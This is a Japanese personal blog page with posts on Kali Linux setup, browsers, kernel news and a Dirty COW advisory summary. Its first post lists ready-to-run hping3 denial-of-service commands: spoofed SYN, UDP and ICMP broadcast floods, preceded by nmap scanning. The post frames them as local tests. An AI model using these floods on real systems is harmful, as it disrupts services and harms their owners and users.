2016年10月31日月曜日

hping3の使い方

これから記載する内容については、絶対に外部ではやらないでください。
そして、何かあっても、当ブログ主は一切責任を負いませんので、あくまでも自己責任の範疇で、かつローカルで影響のない環境内でのみテストをされてみてください。

前提.
・TCPのスリーウェイハンドシェイクが理解できていること。  こちらに参考情報があります
・root権限で実行すること

手順1.
ステルススキャンを実施
#nmap -v -sS 対象ホスト名(またはドメイン)
詳しくは、こちら

手順2.
開いているポートを見つけたら、どんなOSかちょっと見てみましょう。
#nmap -v -O 対象ホスト名(またはドメイン)

手順3.
さて、どのポートが開いているかにより、次のいずれかを選択して実行するとテストができます。

(1)TCPの場合
a)TCP SYN Flood
#hping3 --rand-source -S -L 0 -p 対象ポート番号 対象IP

b)TCP Connection Flood
#hping3 -a -SAFRU -L 0 -M 0 -p 対象ポート番号 対象ホスト名 --flood

(2)UDPの場合
UDP Flood
#hping3 --rand-source --udp 対象IP --flood

(3)ping echoが返ってきた場合
ICMP Flood
#hping3 --icmp --spoof 対象IP ブロードキャスト・アドレス --flood

hping3の使い方は非常に奥が深いので、引き続き記載して行きたいと思います。

※悪用は決してしないでください。

2016年10月30日日曜日

ブラウザ ChromiumとGoogle Chromeの違い・・・

最近、ChromiumとChromeのちがいについて、関心を持たれている方がいらっしゃるようなので、ちょっとここで取り上げたいと思います。

Chromium、そもそもの誕生は・・・
Google Chromeが最初に提供されたのは2008年の9月で、それに伴う形でChromiumのソースコードの配布も始められ、現在に至っています。
また、Chromiumは、オープンソースプロジェクトに対して与えられた名称であり、Chromiumプロジェクトによってブラウザのソースコードの提供や保守を行っています。

Google Chromeは・・・
以下のところが異なっています。
・Flash Playerの同梱
・Chrome PDF Viewerの統合
・Googleの名称とそのブランドロゴ
・自動アップデート機能 (Google Update)
・Googleへの利用状況やクラッシュレポート送信機能
・RLZトラッキングの送信機能
・Googleの翻訳機能

つまり、Chromiumはオープンソースプロジェクトであり、Google Chromeはその成果物の位置づけとみることができるので、両者互いに絡み合う関係にあります。
FedoraとRHELとの関係に似ているかもしれません。
ただし、Chromiumはオープンソースと行こともあり、多くのディストリビューション上でも動作ができるようになっておりますが、その点Chromeはディストリビューション限定ということもあり、普及度は広いかもしれません。
さて、性能面で言いますと、直接私が測定した結果ではなく、あくまでも開発携帯から見た点からの話とさせていただきますが、やはりChromeの方が、Chromiumをベースにしているだけあって、Googleのもつ機能とリンクしたり機能も強化追加されていたりで、一見良さそうに思います。
とはいえ、使用していてその性能差を体感できるかと言いますと、殆ど分からないと思います。
アドオンなども互いに共通で利用できますので、特に心配はありません。

では、個人的に今どちらを使用しているかと言いますと、Chromiumを使用しています。
なぜならば、Chromiumの場合はソースコードが公開されており、怪しかったり不明な部分は全て公開されているためそのような心配はありませんがGoogle社のChromeの場合は、企業が営利目的で開発していることもありますので、その点何かせ行われているのか、正直わからないところがあり、不安がよぎります。とはいえ、
・セキュリティ面を考慮したサンドボックスを用意
・レンダリング機能の強化
など優れている面がありますので、正直好みの問題かと思います。
一時期は、IEよりもシェアがあったこともあり、おすすめのブラウザでもあります。
最新機能、セキュリティー面で安全に使いたいならばChrome、多くのプラットフォームを使っている人で、共通で使えるインターフェースのブラウザを使用したい場合はChromium、という選択の仕方もあるかと思います。

ちなみに、私はどちらも使っています。
気分次第で、切り替えたりしています。
今後Flashが消滅する方向に動き、HTML5が本格的に標準になった暁には、どうなるのかが気になるところではありますが、図式的には
Chromium →成果物を更にGoogle社がブラッシュアップしたChrome
なので、これを踏まえて、選択されていただければと思います。

2016年10月27日木曜日

カーネル4.7系がEOL(End Of Life)になりました、そしてカーネル4.9が !

Kali Linux 2016でも使用しているカーネル4.7系がEOLになりました。
ただし、嬉しいお知らせとしてカーネル4.9についての情報です。

ossBytesに10月25日(米国時間)に掲載された記事「Linux 4.9 Is Going To Be The "Biggest Ever" Linux Release」が、2016年12月にリリースが予定されている「Linux 4.9」はこれまでで最も大きなリリースになるだろうと伝えたそうです。

その理由として、
・コミット数がこれまでのリリースの中で特に大きいこと
・Linus Torvalds氏がメールでそうした内容を示唆していること
・Linux 4.9がLTSリリースになる可能性がある
ことなどが挙げられています。
ただし、あくまでも今のところ可能性のお話にとどまっていますが・・・

詳しくは、こちらの記事をご覧ください。

ちなみに、我が家のUbuntu16.04LTS,Linux Mint 18 は、引き続き4.4系を続けていきます !

いきなり、4.8への移行も今のところ検討していません。

枯れていくカーネルとOSで安定稼働を目指します !


新品価格
¥3,240から
(2016/10/27 23:55時点)

2016年10月26日水曜日

Ubuntu 16.04にライブカーネルパッチ登場

Canonicalは10月20日(米国時間)、「Live kernel patching from Canonical now available for Ubuntu 16.04 LTS|Ubuntu Insights」において、Ubuntu 16.04 LTSを対象とした無償のライブパッチサービス「Ubuntu Livepatch Service」の提供を開始しました。
この機能を利用することで、計画にないダウンタイムを最小限に抑えるとともにセキュリティを最新の状態に保つことができます。

Linuxカーネルは、今から1年半前にリリースされたLinux 4.0から、機能的には再起動を実施することなくカーネルへのパッチの適用を可能とするライブパッチの機能が利用できるようになっています。
しかしながら、これまで各Linuxベンダーは有償サービスに対してのみこの機能をサポートしており、無償のままでは利用できない状態が続いていました。

そのような状況のなか、Canonicalはすべてのユーザーに対し、1人当たり3台までこのライブパッチ機能を無償で提供すると発表しました。
3台を超えるマシンに対して適用したい場合はサブスクリプション購入を実施することで可能とされています。
複数のコンテナや仮想環境を運用しているような環境では、ホストは簡単に再起動を実施できません。ライブパッチ機能を利用することでこうした環境のホストカーネルに対してセキュリティパッチの適用が可能になります。

Ubuntuサーバーを活用されている企業にとっては福音になるのではないでしょうか。


2016年10月25日火曜日

Linuxカーネルに、特権への昇格が生じるおそれがある脆弱性「CVE-2016-5195」が判明

Linuxカーネルのメモリ管理サブシステムに存在する脆弱性。「copy-on-write(COW)」に起因することから別名「Dirty COW」と呼ばれている。

セキュリティ研究者のPhil Oester氏が報告したもので、脆弱性は、2007年より存在。悪用されるとローカルユーザーによってルート権限を奪われるおそれがある。実証コードが公開されているほか、すでに悪用も確認されているという。

【影響】
・権限のないローカルユーザがそれ以外の場合は、読み取り専用メモリマッピングへの書き込みアクセスを得るため、システム上でその特権を高めるためにこの欠陥を使用することができます。
・この欠陥は、適切なアクセス権が設定されていない変更を防ぐことになる標準許可メカニズムをバイパスして、ディスク上のバイナリを変更するには、ローカルシステムアカウントを使用して攻撃を可能にします。

詳細は、こちらをご覧ください。

一部ディストリビューションではアップデートをリリースしており、ユーザーへアップデートを呼びかけているとのことです。

できるだけ、早急に対応をされてください。
kernel.orgでは、change.logを確認してみてください。


新品価格
¥1,630から
(2016/10/24 20:02時点)

2016年10月24日月曜日

Kali Linux 2016.2 への基本的な設定を(LightDM+ネットワーク+日本語入力)

Kali Linuxインストール直後、CUIで起動した場合は、
root及びインストール時に
#startx

でgnomeのデスクトッフ画面を表示させてください。
その後に、端末で

#ifconfig eth0 on
これをした後に、DHCPクライアントとして使用するため我が家では

#ipconfig eth0 up
#dhclient eth0

この後、
#ifconfig eth0
でIPアドレスが割り当てられていることを確認。

さらに、
#apt-get -y install synaptic
をインストールして、今後のパッケージを.インストールしていきます。
まずこれでインストールすべきは、

・LigthDM  ログイン時GUIの画面  =>個人的に気に入っているためGDMでも可。
・network-manager  =>起動時に、eth0またはWiFi自動起動をする際のGUIツール。
         当然起動時にONにならないと話しにならないので、設定すること

これで再起動してうまくLightDMでログイン(root)できて、ifconfig eth0でIPアドレスがインストールできたらこちらのもの !

私の場合は、synapticで、更に印刷関係(CUPS,プリンターのドライバ。ネットワーク越しに接続しています)
その次に、日本語入力関連で、fctx+Mozc関連をすべてインストール、そして改めて再起動させると日本語入力ができます。

ここまでできますと、あとは端末を開いて
#useradd -m USERNAME   <=任意のログイン名を追加登録
#passwd USERNAME    <=任意のログイン名に対するパスワード登録

この後に、rootをログアウトをして、USERNAMEでログインして、無事にMATEのデスクトップが表示されれば、あとはsynapticを使って、入れたいアプリをどんどん追加していけばOK !
私は、Firefoxではなく、chromium(Googleのchromのベース)を使っています.

その他、普段使いとして入れておいたほうが良いと思われるものについては、また後日記載したいと思います。

ちなみに、Kali Linux2016はローリング・リリースなので、こまめに
#apt-get update && apt-get -y upgrade
をしたほうが良いかもしれません。

まずは簡単に、ご参考まで。

かなり端折って書いてしまいました。
すみません。


新品価格
¥3,650から
(2016/10/24 18:32時点)

2016年10月23日日曜日

Kali Linux2016のGnomeからMATEへ切り替えてみました !

Kali Linux 2016へ当初MATE版をインストールして使う予定でしたが、どうもうまく動かなかったところがあるため(Caja関連)、Gnome版をクリーンインストール。
その後非常に快適に使っていましたが、UbuntuもLinux MintもMATE版を使っていることもあり、とりあえず、Gnome版へMATE関連のパッケージをインストールしました。
結果から申し上げますと、正常に動作しています。
原因は分かりませんが、Ubuntu,Mintと遜色なく同じインターフェースで使えていますので、とても快適です。
あとは、SSDへの換装ができれば、ペネトレーションテスト用のノートPCとしてはほぼ完成の領域に入ったかと思います。(ハード面で)
あとはツール類の追加と使いこなしですね。

おっと、それから、これからKali Linuxをクリーンインストールした時に、rootでログインする際CUIになっているため、私はLightDMを使って、自動起動させています。
この当たりも、私自信の覚書として書きたいと思います。

ちなみに、現状Kali Linux 2-16のカーネルは4.7系ですね。4.8へは移行せずに、暫くはKali Linux 2016で提供されるカーネル4.7系を使い続けて行こうと思っています。
何らかの変更が加わっているかと思いますので。

MATE版にすることにより、使い勝手が全く同じになりました。
通常使いのとしても十分使えるので、どこかに持って行ってちょっと仕事をするのにも便利かも。

ちなみに、クリーンインストールしたあと、私の環境だけかもしれませんが、いくつかインストール時に注意する点がありますので、それも合わせて記載させていただきます。

いやー、それにしても便利便利 ! !

新品価格
¥1,630から
(2016/10/23 15:23時点)

2016年10月16日日曜日

Kali Linux2016へTorブラウザを入れました

Tor ブラウザ、Kali Linuxでは、すでに入っているものと思われた方もいるかと思いますが、実は入っていません。
よって、別途.インストールする必要があります。
ここから、日本語版Linux(64Bit版のKali Linux2016なので、64Bit版をダウンロード)
そして展開後セットアップを実行すると、日本語版が使えます。
Deep webサイトめぐりをする方は、是非安全のために、ご利用されることをおすすめいたします。

それから、現在下記の本を読みながらツールをインストールしています。
そして、せっかくなので、別のサード・ノートPCに入れているBACKBOXにも追加インストールしています。それとメインのノートPCのUbuntu16.04LTSへも追加しています。
まだまだ、ツールを入れて少しいじっている程度ですので、これからとなりますが、ますますま強化されているようで、ワクワクしてきます。
もし、ペネトレーションテストに興味のある方は、この本は個人的におすすめですので、ぜひご覧ください。

なかなか良さげです ! !

新品価格
¥3,650から
(2016/10/16 15:37時点)

2016年10月10日月曜日

Kali Linux 2016.2 (Gnome版)をクリーン・インストール !

当初、MATE版をインストールしましたが、
・デスクトップ上のホームフォルダがクリックしても全くフォルダが開かない
・ファイルブラウザの表示ができない
など
私の使用しているマシン(daynabook Satellite)では調子が悪いため、Gnome版に切り替えて使っています。
こちらは、印刷やスキャナーも含め、周辺機器とも問題なく使用でき、そしてGnome関連のツール類についても支障なく使えるので、今後はGnome版で使っていきたいと思います。今は、下記の本を購入してツール類を追加、いろいろと勉強中です。
それと、今回すっかり忘れていたのですが、systemdが使われているので、「rc.d関連のファイルは?」等としばらく探したり、間抜けなことをしていました(笑)

さて、ローリング・リリースであるため、今後末永く使っていけそうなので、本を片手にいろいろと勉強をしていきたいと思います。

それにしても、MATE版よりも安定して使えているのは、私だけかなぁ・・・・

新品価格
¥3,650から
(2016/10/10 19:20時点)

2016年10月1日土曜日

BACKBOX Linuxをインストール !


書籍「サイバーセキュリティテスト完全テスト Kali Linuxによるペネトレーションテスト」を購入しました。そこで、初めて知ったディストリビューションがこのBACKBOXです。
Kali Liunxはほぼ標準とみなされているようですが、この書籍によると、1つのツール、OS、プロセスに依存するのは決して得策ではないとのこと。
確かに、いろいろな観点から、多様なツールを使っていくことが良い私も考えました。
そこで、先だってLinux Mint 18をインストールしたNV5300-41K(CPUは、オリジナルのSempron M100ではなく、AMD Turion(tm) II
Ultra Dual-Core Mobile M620 2.5GHz(デュアルコア)に、Xfce版のBACKBOXをインストールしてみました。
もともとが軽いインタフェースなので、サクサクと動いて快適です。
ベースがUbuntu 14.04LTSなので、日本語化及びUbuntuのアプリケーションが動きます。
また、インストールしたばかりなのですが、一応プリンタも当然問題なく使えること、何よりも使い慣れているUbuntuなので、使いかっては抜群です。
ちなみに、かな漢字変換は、Ubuntuでも使っているMozcを使用しています。

有名な、Distrowatch.comで調べましたが、初のリリースは2013年とのことなので、まだ歴史は浅いのですが、個人的には、今後も継続して開発を進めていただきたいと思っています。
あと、Xfceが殊の外メモリを使わないので、操作感はとても良いので、いずれこのノートPCをペネトレーションテスト用2号機として、今のHDDをSSDへ変更して使っていきたいと思います。
デフォルトのカーネルは4.2系でしたので(既にEOL)4.4系を入れてみました。
当然問題なく、動作しております。

これからしばらくはKali LinuxとBACKBOXの二刀流を極めたいと思います。
いやはや、こんな古い機器でも快適に使えるとは驚きです !

Linuxならではですね。


新品価格
¥3,650から
(2016/10/1 19:45時点)